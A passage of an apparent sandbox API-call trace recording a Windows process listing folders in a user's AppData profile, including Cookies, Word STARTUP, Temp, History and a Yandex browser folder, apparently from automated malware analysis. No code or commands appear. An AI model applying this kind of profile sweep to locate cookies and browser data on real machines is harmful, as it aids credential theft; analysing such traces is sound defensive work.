lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0 [0221.544] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.544] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", lpFilePart=0x0) returned 0x36 [0221.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.544] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", lpFilePart=0x0) returned 0x36 [0221.544] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.545] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.545] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b354e30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b354e30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b4aba90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4615, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0221.545] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.545] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.545] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", lpFilePart=0x0) returned 0x33 [0221.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.545] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", lpFilePart=0x0) returned 0x33 [0221.546] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.546] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.546] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426e0920, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 1 [0221.546] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.547] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.548] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", lpFilePart=0x0) returned 0x34 [0221.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.548] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", lpFilePart=0x0) returned 0x34 [0221.548] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.549] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.549] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0221.549] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0221.549] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0221.549] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e87ab80, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e87ab80, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0221.550] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0221.550] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0221.550] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x75cc2be0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x75cc2be0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0221.550] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xd5ca32b0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xd5ca32b0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0221.550] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0221.551] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e803170, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0221.551] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x794f55f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0221.551] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0221.551] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 0 [0221.551] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.552] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", lpFilePart=0x0) returned 0x31 [0221.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.552] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", lpFilePart=0x0) returned 0x31 [0221.553] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.554] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.554] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0221.554] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 0 [0221.554] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.555] CoTaskMemAlloc (cb=0x20c) returned 0x796e90 [0221.555] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x796e90 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0221.555] CoTaskMemFree (pv=0x796e90) [0221.555] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x36ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0221.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1b4) returned 1 [0221.555] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x36ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0221.556] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\*", lpFindFileData=0x36ef64 | out: lpFindFileData=0x36ef64*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.556] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.556] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0221.556] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79dbc710, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79dbc710, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79dbc710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0221.557] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x79ba73d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xc63243a0, ftLastWriteTime.dwHighDateTime=0x1d7e780, nFileSizeHigh=0x0, nFileSizeLow=0x11eca5, dwReserved0=0x0, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0221.557] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0221.557] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8970b3f0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x8970b3f0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0221.557] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79dbc710, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79dbc710, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79dbc710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0221.557] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0221.557] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e0476d0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yandex", cAlternateFileName="")) returned 1 [0221.558] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.558] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef24) 